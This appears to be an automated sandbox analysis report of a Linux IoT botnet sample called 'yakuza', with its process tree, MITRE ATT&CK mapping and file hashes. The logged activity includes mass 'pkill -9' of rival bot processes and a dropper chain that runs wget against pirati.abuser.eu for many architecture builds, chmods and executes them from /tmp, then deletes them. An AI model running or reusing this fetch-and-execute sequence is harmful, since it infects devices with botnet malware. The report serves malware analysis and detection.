- - /bin/sh
    sh -c "pkill -9 iaGv || busybox pkill -9 iaGv"
    3⤵
    PID:1087
  - - /usr/bin/pkill
      pkill -9 iaGv
      4⤵
      PID:1088
  - - /bin/busybox
      busybox pkill -9 iaGv
      4⤵
      PID:1089
- - /bin/sh
    sh -c "pkill -9 5aA3 || busybox pkill -9 5aA3"
    3⤵
    PID:1090
  - - /usr/bin/pkill
      pkill -9 5aA3
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1091
  - - /bin/busybox
      busybox pkill -9 5aA3
      4⤵
      PID:1092
- - /bin/sh
    sh -c "pkill -9 SoRAxD420LOL || busybox pkill -9 SoRAxD420LOL"
    3⤵
    PID:1093
  - - /usr/bin/pkill
      pkill -9 SoRAxD420LOL
      4⤵
      Reads CPU attributes
      PID:1094
  - - /bin/busybox
      busybox pkill -9 SoRAxD420LOL
      4⤵
      PID:1095
- - /bin/sh
    sh -c "pkill -9 insomni || busybox pkill -9 insomni"
    3⤵
    PID:1096
  - - /usr/bin/pkill
      pkill -9 insomni
      4⤵
      PID:1097
  - - /bin/busybox
      busybox pkill -9 insomni
      4⤵
      PID:1098
- - /bin/sh
    sh -c "pkill -9 640277 || busybox pkill -9 640277"
    3⤵
    PID:1099
  - - /usr/bin/pkill
      pkill -9 640277
      4⤵
      Reads CPU attributes
      PID:1100
  - - /bin/busybox
      busybox pkill -9 640277
      4⤵
      PID:1101
- - /bin/sh
    sh -c "pkill -9 SoraBeReppin1337 || busybox pkill -9 SoraBeReppin1337"
    3⤵
    PID:1102
  - - /usr/bin/pkill
      pkill -9 SoraBeReppin1337
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1103
  - - /bin/busybox
      busybox pkill -9 SoraBeReppin1337
      4⤵
      PID:1104
- - /bin/sh
    sh -c "pkill -9 ipcamCache || busybox pkill -9 ipcamCache"
    3⤵
    - System Network Configuration Discovery
    PID:1105
  - - /usr/bin/pkill
      pkill -9 ipcamCache
      4⤵
      Reads runtime system information
      System Network Configuration Discovery
      PID:1106
  - - /bin/busybox
      busybox pkill -9 ipcamCache
      4⤵
      System Network Configuration Discovery
      PID:1107
- - /bin/sh
    sh -c "pkill -9 66tlGg9Q || busybox pkill -9 66tlGg9Q"
    3⤵
    PID:1108
  - - /usr/bin/pkill
      pkill -9 66tlGg9Q
      4⤵
      Reads runtime system information
      PID:1109
  - - /bin/busybox
      busybox pkill -9 66tlGg9Q
      4⤵
      PID:1110
- - /bin/sh
    sh -c "pkill -9 T || busybox pkill -9 T"
    3⤵
    PID:1111
  - - /usr/bin/pkill
      pkill -9 T
      4⤵
      PID:1112
  - - /bin/busybox
      busybox pkill -9 T
      4⤵
      PID:1113
- - /bin/sh
    sh -c "pkill -9 jUYfouyf87 || busybox pkill -9 jUYfouyf87"
    3⤵
    PID:1114
  - - /usr/bin/pkill
      pkill -9 jUYfouyf87
      4⤵
      Reads CPU attributes
      PID:1115
  - - /bin/busybox
      busybox pkill -9 jUYfouyf87
      4⤵
      PID:1116
- - /bin/sh
    sh -c "pkill -9 6ke3 || busybox pkill -9 6ke3"
    3⤵
    PID:1117
  - - /usr/bin/pkill
      pkill -9 6ke3
      4⤵
      PID:1118
  - - /bin/busybox
      busybox pkill -9 6ke3
      4⤵
      PID:1119
- - /bin/sh
    sh -c "pkill -9 TOKYO3 || busybox pkill -9 TOKYO3"
    3⤵
    PID:1120
  - - /usr/bin/pkill
      pkill -9 TOKYO3
      4⤵
      Reads CPU attributes
      PID:1121
  - - /bin/busybox
      busybox pkill -9 TOKYO3
      4⤵
      PID:1122
- - /bin/sh
    sh -c "pkill -9 lyEeaXul2dULCVxh || busybox pkill -9 lyEeaXul2dULCVxh"
    3⤵
    PID:1123
  - - /usr/bin/pkill
      pkill -9 lyEeaXul2dULCVxh
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1124
  - - /bin/busybox
      busybox pkill -9 lyEeaXul2dULCVxh
      4⤵
      PID:1125
- - /bin/sh
    sh -c "pkill -9 93OfjHZ2z || busybox pkill -9 93OfjHZ2z"
    3⤵
    PID:1126
  - - /usr/bin/pkill
      pkill -9 93OfjHZ2z
      4⤵
      Reads runtime system information
      PID:1127
  - - /bin/busybox
      busybox pkill -9 93OfjHZ2z
      4⤵
      PID:1128
- - /bin/sh
    sh -c "pkill -9 TY2gD6MZvKc7KU6r || busybox pkill -9 TY2gD6MZvKc7KU6r"
    3⤵
    PID:1129
  - - /usr/bin/pkill
      pkill -9 TY2gD6MZvKc7KU6r
      4⤵
      PID:1130
  - - /bin/busybox
      busybox pkill -9 TY2gD6MZvKc7KU6r
      4⤵
      PID:1131
- - /bin/sh
    sh -c "pkill -9 mMkiy6f87l || busybox pkill -9 mMkiy6f87l"
    3⤵
    PID:1132
  - - /usr/bin/pkill
      pkill -9 mMkiy6f87l
      4⤵
      Reads CPU attributes
      PID:1133
  - - /bin/busybox
      busybox pkill -9 mMkiy6f87l
      4⤵
      PID:1134
- - /bin/sh
    sh -c "pkill -9 A023UU4U24UIU || busybox pkill -9 A023UU4U24UIU"
    3⤵
    PID:1135
  - - /usr/bin/pkill
      pkill -9 A023UU4U24UIU
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1136
  - - /bin/busybox
      busybox pkill -9 A023UU4U24UIU
      4⤵
      PID:1137
- - /bin/sh
    sh -c "pkill -9 TheWeeknd || busybox pkill -9 TheWeeknd"
    3⤵
    PID:1138
  - - /usr/bin/pkill
      pkill -9 TheWeeknd
      4⤵
      Reads CPU attributes
      PID:1139
  - - /bin/busybox
      busybox pkill -9 TheWeeknd
      4⤵
      PID:1140
- - /bin/sh
    sh -c "pkill -9 mioribitches || busybox pkill -9 mioribitches"
    3⤵
    PID:1141
  - - /usr/bin/pkill
      pkill -9 mioribitches
      4⤵
      PID:1142
  - - /bin/busybox
      busybox pkill -9 mioribitches
      4⤵
      PID:1143
- - /bin/sh
    sh -c "pkill -9 A5p9 || busybox pkill -9 A5p9"
    3⤵
    PID:1144
  - - /usr/bin/pkill
      pkill -9 A5p9
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1145
  - - /bin/busybox
      busybox pkill -9 A5p9
      4⤵
      PID:1146
- - /bin/sh
    sh -c "pkill -9 TheWeeknds || busybox pkill -9 TheWeeknds"
    3⤵
    PID:1147
  - - /usr/bin/pkill
      pkill -9 TheWeeknds
      4⤵
      Reads CPU attributes
      PID:1148
  - - /bin/busybox
      busybox pkill -9 TheWeeknds
      4⤵
      PID:1149
- - /bin/sh
    sh -c "pkill -9 mnblkjpoi || busybox pkill -9 mnblkjpoi"
    3⤵
    PID:1150
  - - /usr/bin/pkill
      pkill -9 mnblkjpoi
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1151
  - - /bin/busybox
      busybox pkill -9 mnblkjpoi
      4⤵
      PID:1152
- - /bin/sh
    sh -c "pkill -9 AbAd || busybox pkill -9 AbAd"
    3⤵
    PID:1153
  - - /usr/bin/pkill
      pkill -9 AbAd
      4⤵
      Reads CPU attributes
      PID:1154
  - - /bin/busybox
      busybox pkill -9 AbAd
      4⤵
      PID:1155
- - /bin/sh
    sh -c "pkill -9 Tokyos || busybox pkill -9 Tokyos"
    3⤵
    PID:1156
  - - /usr/bin/pkill
      pkill -9 Tokyos
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1157
  - - /bin/busybox
      busybox pkill -9 Tokyos
      4⤵
      PID:1158
- - /bin/sh
    sh -c "pkill -9 neb || busybox pkill -9 neb"
    3⤵
    PID:1159
  - - /usr/bin/pkill
      pkill -9 neb
      4⤵
      Reads CPU attributes
      PID:1160
  - - /bin/busybox
      busybox pkill -9 neb
      4⤵
      PID:1161
- - /bin/sh
    sh -c "pkill -9 Akiru || busybox pkill -9 Akiru"
    3⤵
    PID:1162
  - - /usr/bin/pkill
      pkill -9 Akiru
      4⤵
      Reads CPU attributes
      PID:1163
  - - /bin/busybox
      busybox pkill -9 Akiru
      4⤵
      PID:1164
- - /bin/sh
    sh -c "pkill -9 U8inTz || busybox pkill -9 U8inTz"
    3⤵
    PID:1165
  - - /usr/bin/pkill
      pkill -9 U8inTz
      4⤵
      Reads CPU attributes
      PID:1166
  - - /bin/busybox
      busybox pkill -9 U8inTz
      4⤵
      PID:1167
- - /bin/sh
    sh -c "pkill -9 netstats || busybox pkill -9 netstats"
    3⤵
    PID:1168
  - - /usr/bin/pkill
      pkill -9 netstats
      4⤵
      Reads CPU attributes
      PID:1169
  - - /bin/busybox
      busybox pkill -9 netstats
      4⤵
      PID:1170
- - /bin/sh
    sh -c "pkill -9 Alex || busybox pkill -9 Alex"
    3⤵
    PID:1171
  - - /usr/bin/pkill
      pkill -9 Alex
      4⤵
      Reads runtime system information
      PID:1172
  - - /bin/busybox
      busybox pkill -9 Alex
      4⤵
      PID:1173
- - /bin/sh
    sh -c "pkill -9 W9RCAKM20T || busybox pkill -9 W9RCAKM20T"
    3⤵
    PID:1174
  - - /usr/bin/pkill
      pkill -9 W9RCAKM20T
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1175
  - - /bin/busybox
      busybox pkill -9 W9RCAKM20T
      4⤵
      PID:1176
- - /bin/sh
    sh -c "pkill -9 newnetword || busybox pkill -9 newnetword"
    3⤵
    PID:1177
  - - /usr/bin/pkill
      pkill -9 newnetword
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1178
  - - /bin/busybox
      busybox pkill -9 newnetword
      4⤵
      PID:1179
- - /bin/sh
    sh -c "pkill -9 Ayo215 || busybox pkill -9 Ayo215"
    3⤵
    PID:1180
  - - /usr/bin/pkill
      pkill -9 Ayo215
      4⤵
      PID:1181
  - - /bin/busybox
      busybox pkill -9 Ayo215
      4⤵
      PID:1182
- - /bin/sh
    sh -c "pkill -9 Word || busybox pkill -9 Word"
    3⤵
    PID:1183
  - - /usr/bin/pkill
      pkill -9 Word
      4⤵
      Reads CPU attributes
      PID:1184
  - - /bin/busybox
      busybox pkill -9 Word
      4⤵
      PID:1185
- - /bin/sh
    sh -c "pkill -9 nloads || busybox pkill -9 nloads"
    3⤵
    PID:1186
  - - /usr/bin/pkill
      pkill -9 nloads
      4⤵
      Reads runtime system information
      PID:1187
  - - /bin/busybox
      busybox pkill -9 nloads
      4⤵
      PID:1188
- /bin/rm
  rm -rf yakuza.mips
  2⤵
  - System Network Configuration Discovery
  PID:740
- /usr/bin/wget
  wget http://pirati.abuser.eu/yakuza.mipsel
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:744
- /bin/chmod
  chmod +x yakuza.mipsel
  2⤵
  - File and Directory Permissions Modification
  PID:751
- /tmp/yakuza.mipsel
  ./yakuza.mipsel
  2⤵
  - System Network Configuration Discovery
  PID:752
- /bin/rm
  rm -rf yakuza.mipsel
  2⤵
  - System Network Configuration Discovery
  PID:754
- /usr/bin/wget
  wget http://pirati.abuser.eu/yakuza.sh
  2⤵
  - Writes file to tmp directory
  PID:756
- /bin/chmod
  chmod +x yakuza.sh
  2⤵
  - File and Directory Permissions Modification
  PID:766
- /tmp/yakuza.sh
  ./yakuza.sh
  2⤵
  PID:767
- /bin/rm
  rm -rf yakuza.sh
  2⤵
  PID:769
- /usr/bin/wget
  wget http://pirati.abuser.eu/yakuza.x86
  2⤵
  - Writes file to tmp directory
  PID:770
- /bin/chmod
  chmod +x yakuza.x86
  2⤵
  - File and Directory Permissions Modification
  PID:776
- /tmp/yakuza.x86
  ./yakuza.x86
  2⤵
  PID:777
- /bin/rm
  rm -rf yakuza.x86
  2⤵
  PID:780
- /usr/bin/wget
  wget http://pirati.abuser.eu/yakuza.arm6
  2⤵
  - Writes file to tmp directory
  PID:781
- /bin/chmod
  chmod +x yakuza.arm6
  2⤵
  - File and Directory Permissions Modification
  PID:789
- /tmp/yakuza.arm6
  ./yakuza.arm6
  2⤵
  PID:790
- /bin/rm
  rm -rf yakuza.arm6
  2⤵
  PID:793
- /usr/bin/wget
  wget http://pirati.abuser.eu/yakuza.i686
  2⤵
  - Writes file to tmp directory
  PID:795
- /bin/chmod
  chmod +x yakuza.i686
  2⤵
  - File and Directory Permissions Modification
  PID:809
- /tmp/yakuza.i686
  ./yakuza.i686
  2⤵
  PID:810
- /bin/rm
  rm -rf yakuza.i686
  2⤵
  PID:813
- /usr/bin/wget
  wget http://pirati.abuser.eu/yakuza.ppc
  2⤵
  - Writes file to tmp directory
  PID:815
- /bin/chmod
  chmod +x yakuza.ppc
  2⤵
  - File and Directory Permissions Modification
  PID:836
- /tmp/yakuza.ppc
  ./yakuza.ppc
  2⤵
  PID:837
- /bin/rm
  rm -rf yakuza.ppc
  2⤵
  PID:840
- /usr/bin/wget
  wget http://pirati.abuser.eu/yakuza.i586
  2⤵
  - Writes file to tmp directory
  PID:842
- /bin/chmod
  chmod +x yakuza.i586
  2⤵
  - File and Directory Permissions Modification
  PID:856
- /tmp/yakuza.i586
  ./yakuza.i586
  2⤵
  PID:858
- /bin/rm
  rm -rf yakuza.i586
  2⤵
  PID:862
- /usr/bin/wget
  wget http://pirati.abuser.eu/yakuza.m68k
  2⤵
  - Writes file to tmp directory
  PID:863
- /bin/chmod
  chmod +x yakuza.m68k
  2⤵
  - File and Directory Permissions Modification
  PID:868
- /tmp/yakuza.m68k
  ./yakuza.m68k
  2⤵
  PID:869
- /bin/rm
  rm -rf yakuza.m68k
  2⤵
  PID:873
- /usr/bin/wget
  wget http://pirati.abuser.eu/yakuza.arm4
  2⤵
  - Writes file to tmp directory
  PID:875
- /bin/chmod
  chmod +x yakuza.arm4
  2⤵
  - File and Directory Permissions Modification
  PID:879
- /tmp/yakuza.arm4
  ./yakuza.arm4
  2⤵
  PID:880
- /bin/rm
  rm -rf yakuza.arm4
  2⤵
  PID:882
- /usr/bin/wget
  wget http://pirati.abuser.eu/yakuza.arm5
  2⤵
  - Writes file to tmp directory
  PID:883
- /bin/chmod
  chmod +x yakuza.arm5
  2⤵
  - File and Directory Permissions Modification
  PID:894
- /tmp/yakuza.arm5
  ./yakuza.arm5
  2⤵
  PID:895
- /bin/rm
  rm -rf yakuza.arm5
  2⤵
  PID:899
- /usr/bin/wget
  wget http://pirati.abuser.eu/yakuza.arm7
  2⤵
  - Writes file to tmp directory
  PID:900
- /bin/chmod
  chmod +x yakuza.arm7
  2⤵
  - File and Directory Permissions Modification
  PID:937
- /tmp/yakuza.arm7
  ./yakuza.arm7
  2⤵
  PID:938
- /bin/rm
  rm -rf yakuza.arm7
  2⤵
  PID:940
- /usr/bin/wget
  wget http://pirati.abuser.eu/yakuza.sparc
  2⤵
  - Writes file to tmp directory
  PID:941
- /bin/chmod
  chmod +x yakuza.sparc
  2⤵
  - File and Directory Permissions Modification
  PID:945
- /tmp/yakuza.sparc
  ./yakuza.sparc
  2⤵
  PID:946
- /bin/rm
  rm -rf yakuza.sparc
  2⤵
  PID:948

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/yakuza.mips

Filesize
183KB

MD5
983c5d72544a32a574f5e914253a618b

SHA1
76cd31603cb4e7fa0c78e37c62b5857098f78442

SHA256
fc4a02d90a8b9efeb4dfba835d514b728399bc8424253341a30e13b40cb15373

SHA512
7a667b29715b153c58abe022d862f0fcc789b24f5f7cd8fb94c5079d0c513d54ba37b061979993c6a3a1ebe1046ceeb03581119b542bef7b1abe8dc6b300c9bf

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads